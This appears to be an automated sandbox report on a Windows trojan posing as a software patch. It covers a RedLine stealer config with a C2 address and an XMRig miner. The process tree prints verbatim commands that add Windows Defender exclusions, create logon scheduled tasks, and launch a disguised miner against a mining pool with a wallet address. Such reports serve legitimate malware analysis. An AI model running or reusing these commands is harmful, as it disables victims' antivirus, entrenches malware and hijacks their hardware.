Analysis
-
max time kernel
153s -
max time network
164s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-10-2021 16:15
Static task
static1
Behavioral task
behavioral1
Sample
Software patch by Silensix.exe
Resource
win7-en-20210920
General
-
Target
Software patch by Silensix.exe
-
Size
3.0MB
-
MD5
1f1d67844ed54e1f03355f57ba8b17fc
-
SHA1
248262da44662b7347ff6de745ac498ca7984e88
-
SHA256
f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42
-
SHA512
9714f8fbd1533b54f4fbff6da24ba322e6f49ac47bc1a83d336424fb31cbd0f6b0bff8139f4ca9a13706593fbe288f89a9f74103a364fd56e13869dc32bde73d
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3720-140-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3720-141-0x0000000000418D32-mapping.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3916-537-0x000000014030F3F8-mapping.dmp xmrig behavioral2/memory/3916-549-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 3748 Datafile32.exe 432 Datafile64.exe 3024 Server32.exe 3720 Server32.exe 3592 services32.exe 1544 services64.exe 3464 sihost32.exe 3320 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
services64.exeSoftware patch by Silensix.exeDatafile64.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/3584-118-0x0000000000EC0000-0x0000000000EC1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral2/memory/432-131-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\System32\services64.exe themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software patch by Silensix.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software patch by Silensix.exeDatafile64.exeservices64.exepid process 3584 Software patch by Silensix.exe 432 Datafile64.exe 1544 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 3024 set thread context of 3720 3024 Server32.exe Server32.exe PID 2492 set thread context of 3916 2492 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3776 schtasks.exe 1628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepid process 2732 conhost.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3720 Server32.exe 1340 conhost.exe 508 powershell.exe 508 powershell.exe 508 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 3672 conhost.exe 3672 conhost.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 3104 powershell.exe 3104 powershell.exe 3104 powershell.exe 2492 conhost.exe 2492 conhost.exe 1720 powershell.exe 1720 powershell.exe 1720 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe 3916 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Software patch by Silensix.execonhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exedescription pid process Token: SeDebugPrivilege 3584 Software patch by Silensix.exe Token: SeDebugPrivilege 2732 conhost.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeSystemEnvironmentPrivilege 3932 powershell.exe Token: SeRemoteShutdownPrivilege 3932 powershell.exe Token: SeUndockPrivilege 3932 powershell.exe Token: SeManageVolumePrivilege 3932 powershell.exe Token: 33 3932 powershell.exe Token: 34 3932 powershell.exe Token: 35 3932 powershell.exe Token: 36 3932 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 3720 Server32.exe Token: SeIncreaseQuotaPrivilege 3960 powershell.exe Token: SeSecurityPrivilege 3960 powershell.exe Token: SeTakeOwnershipPrivilege 3960 powershell.exe Token: SeLoadDriverPrivilege 3960 powershell.exe Token: SeSystemProfilePrivilege 3960 powershell.exe Token: SeSystemtimePrivilege 3960 powershell.exe Token: SeProfSingleProcessPrivilege 3960 powershell.exe Token: SeIncBasePriorityPrivilege 3960 powershell.exe Token: SeCreatePagefilePrivilege 3960 powershell.exe Token: SeBackupPrivilege 3960 powershell.exe Token: SeRestorePrivilege 3960 powershell.exe Token: SeShutdownPrivilege 3960 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeSystemEnvironmentPrivilege 3960 powershell.exe Token: SeRemoteShutdownPrivilege 3960 powershell.exe Token: SeUndockPrivilege 3960 powershell.exe Token: SeManageVolumePrivilege 3960 powershell.exe Token: 33 3960 powershell.exe Token: 34 3960 powershell.exe Token: 35 3960 powershell.exe Token: 36 3960 powershell.exe Token: SeDebugPrivilege 1340 conhost.exe Token: SeDebugPrivilege 508 powershell.exe Token: SeIncreaseQuotaPrivilege 508 powershell.exe Token: SeSecurityPrivilege 508 powershell.exe Token: SeTakeOwnershipPrivilege 508 powershell.exe Token: SeLoadDriverPrivilege 508 powershell.exe Token: SeSystemProfilePrivilege 508 powershell.exe Token: SeSystemtimePrivilege 508 powershell.exe Token: SeProfSingleProcessPrivilege 508 powershell.exe Token: SeIncBasePriorityPrivilege 508 powershell.exe Token: SeCreatePagefilePrivilege 508 powershell.exe Token: SeBackupPrivilege 508 powershell.exe Token: SeRestorePrivilege 508 powershell.exe Token: SeShutdownPrivilege 508 powershell.exe Token: SeDebugPrivilege 508 powershell.exe Token: SeSystemEnvironmentPrivilege 508 powershell.exe Token: SeRemoteShutdownPrivilege 508 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software patch by Silensix.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exesihost32.exeservices64.exedescription pid process target process PID 3584 wrote to memory of 3748 3584 Software patch by Silensix.exe Datafile32.exe PID 3584 wrote to memory of 3748 3584 Software patch by Silensix.exe Datafile32.exe PID 3584 wrote to memory of 432 3584 Software patch by Silensix.exe Datafile64.exe PID 3584 wrote to memory of 432 3584 Software patch by Silensix.exe Datafile64.exe PID 3584 wrote to memory of 3024 3584 Software patch by Silensix.exe Server32.exe PID 3584 wrote to memory of 3024 3584 Software patch by Silensix.exe Server32.exe PID 3584 wrote to memory of 3024 3584 Software patch by Silensix.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3024 wrote to memory of 3720 3024 Server32.exe Server32.exe PID 3748 wrote to memory of 2732 3748 Datafile32.exe conhost.exe PID 3748 wrote to memory of 2732 3748 Datafile32.exe conhost.exe PID 3748 wrote to memory of 2732 3748 Datafile32.exe conhost.exe PID 2732 wrote to memory of 1780 2732 conhost.exe cmd.exe PID 2732 wrote to memory of 1780 2732 conhost.exe cmd.exe PID 1780 wrote to memory of 3932 1780 cmd.exe powershell.exe PID 1780 wrote to memory of 3932 1780 cmd.exe powershell.exe PID 2732 wrote to memory of 2112 2732 conhost.exe cmd.exe PID 2732 wrote to memory of 2112 2732 conhost.exe cmd.exe PID 2112 wrote to memory of 3776 2112 cmd.exe schtasks.exe PID 2112 wrote to memory of 3776 2112 cmd.exe schtasks.exe PID 1780 wrote to memory of 3960 1780 cmd.exe powershell.exe PID 1780 wrote to memory of 3960 1780 cmd.exe powershell.exe PID 432 wrote to memory of 1340 432 Datafile64.exe conhost.exe PID 432 wrote to memory of 1340 432 Datafile64.exe conhost.exe PID 432 wrote to memory of 1340 432 Datafile64.exe conhost.exe PID 1340 wrote to memory of 2776 1340 conhost.exe cmd.exe PID 1340 wrote to memory of 2776 1340 conhost.exe cmd.exe PID 2776 wrote to memory of 508 2776 cmd.exe powershell.exe PID 2776 wrote to memory of 508 2776 cmd.exe powershell.exe PID 1340 wrote to memory of 3012 1340 conhost.exe cmd.exe PID 1340 wrote to memory of 3012 1340 conhost.exe cmd.exe PID 3012 wrote to memory of 1628 3012 cmd.exe schtasks.exe PID 3012 wrote to memory of 1628 3012 cmd.exe schtasks.exe PID 2732 wrote to memory of 3692 2732 conhost.exe cmd.exe PID 2732 wrote to memory of 3692 2732 conhost.exe cmd.exe PID 3692 wrote to memory of 3592 3692 cmd.exe services32.exe PID 3692 wrote to memory of 3592 3692 cmd.exe services32.exe PID 2776 wrote to memory of 1016 2776 cmd.exe powershell.exe PID 2776 wrote to memory of 1016 2776 cmd.exe powershell.exe PID 1340 wrote to memory of 3720 1340 conhost.exe cmd.exe PID 1340 wrote to memory of 3720 1340 conhost.exe cmd.exe PID 3720 wrote to memory of 1544 3720 cmd.exe services64.exe PID 3720 wrote to memory of 1544 3720 cmd.exe services64.exe PID 3592 wrote to memory of 3672 3592 services32.exe conhost.exe PID 3592 wrote to memory of 3672 3592 services32.exe conhost.exe PID 3592 wrote to memory of 3672 3592 services32.exe conhost.exe PID 3672 wrote to memory of 1700 3672 conhost.exe cmd.exe PID 3672 wrote to memory of 1700 3672 conhost.exe cmd.exe PID 1700 wrote to memory of 1456 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 1456 1700 cmd.exe powershell.exe PID 3672 wrote to memory of 3464 3672 conhost.exe sihost32.exe PID 3672 wrote to memory of 3464 3672 conhost.exe sihost32.exe PID 1700 wrote to memory of 3104 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 3104 1700 cmd.exe powershell.exe PID 3464 wrote to memory of 2812 3464 sihost32.exe conhost.exe PID 3464 wrote to memory of 2812 3464 sihost32.exe conhost.exe PID 3464 wrote to memory of 2812 3464 sihost32.exe conhost.exe PID 1544 wrote to memory of 2492 1544 services64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
91e6681b0d95b11a838130edb5f35b24
SHA12ffb3d6f985b26691ca7a607429d7364d63d1f9c
SHA25652a50b063681d372d9dce2d5791fa686f6b686fb2f3d313c267a24ea322054b2
SHA512f819c2196b5a78a98f857d4d13d39c3f36c5690c51162d03fd771b1bf42d96b305ddec2ea6d3e69ce0dbf0c8027018e57e99f8eb7730924aa2e07c62cb19c5cb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
5565930ffc45d8bf06e27d891141efe3
SHA14eb34e7ea219a5a00cc2aeec884c6ddef5176c69
SHA256ca05e17ed2819c89aef66ba0a44b07e2fcbf370dbdc708ccaea939c950a0e170
SHA5121e72f4d6ac0917a15e8cecf6513711e05fb2f1d86482e3008be3994ddf3a98295c2bc724993639b80880fa3bb1ba6652727d16fbac13d8d1968136b177ad721b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0b29e98dc4e29fe2af07a0525f14c604
SHA10d36d14f7abd0ef596af3cb81457aa800fbe1c70
SHA256eded72d74005df8d664fa9d5c92dc55a9de02b1728eef5c50dffc8100d4f5478
SHA512193cc8133485311a1340395e37024548052dbe6f7e107da83273a240dd371cc319fff700183e2d0c0043cdc4f017b33536e8c39d0b89fb39c68478eca1e08e37
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c87c731d787f17684f3f6705ebe2bc2d
SHA1ea5420e682872dd007a692a9f5f554af5e699cf9
SHA256fec8067989fc090844be1cc76fcad9e881fe26bd6d8ca4486e7c95e85bd8ed68
SHA512b1ed39240c4af5824b7fd4d15b4dd26ee172e62faa4845a9446ba5c9a0e38934ce66179bcbf9b88336916eee91b96c7cf899165b2c6794e11cdfdb4f9308a76b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
40c119ce7e076979501ba6dde896dde5
SHA159a8348b212942ea170879388653ba0e846e49e3
SHA256fa9abe9d3adc004a51e6d0b14adb25dc051396a0bac1e3598b6cd174d59f67d2
SHA5128e18c54f945685d44b10c3eef1eb4fc65eda2c854ddab97088b184cd5823fb5edf99544a896f196e6f5e8cb12eeed3cd4e305c426ad08f3349d7c2961a98ba79
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c45206334353fa6d36cf7be73d24b428
SHA14ac808b000d092063a024dd591237d2b5ed4ffda
SHA2562676ec5c84a196a6caf37b444b58af7853fb23fc0099ae23e6d9125592a995e7
SHA512c225f3c1f2f06eb82ac9c39274a048c69e6adc494d837030f6c979530220b64e24396dae268c0415dcfd3b536ead0a2d923bfb17c2cb42f581bcd17b25d2e30a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b9432cddea4cf0cffa0af13340fcb081
SHA1c421a0a2cbbe2caead98a022cdd26255c46459a0
SHA25681310be9b4274793fab4f6517b72aa57ffc26ed7f9d209a757c6ae64fe2f35d5
SHA512856d084da7f9db0f69af85bca2890a2344a1e1961ebc4d79992c11e76f3b5729bb03a69190684c0dc6ba334c700dd2522658e928ce7652ac5aad2dbd913ba132
-
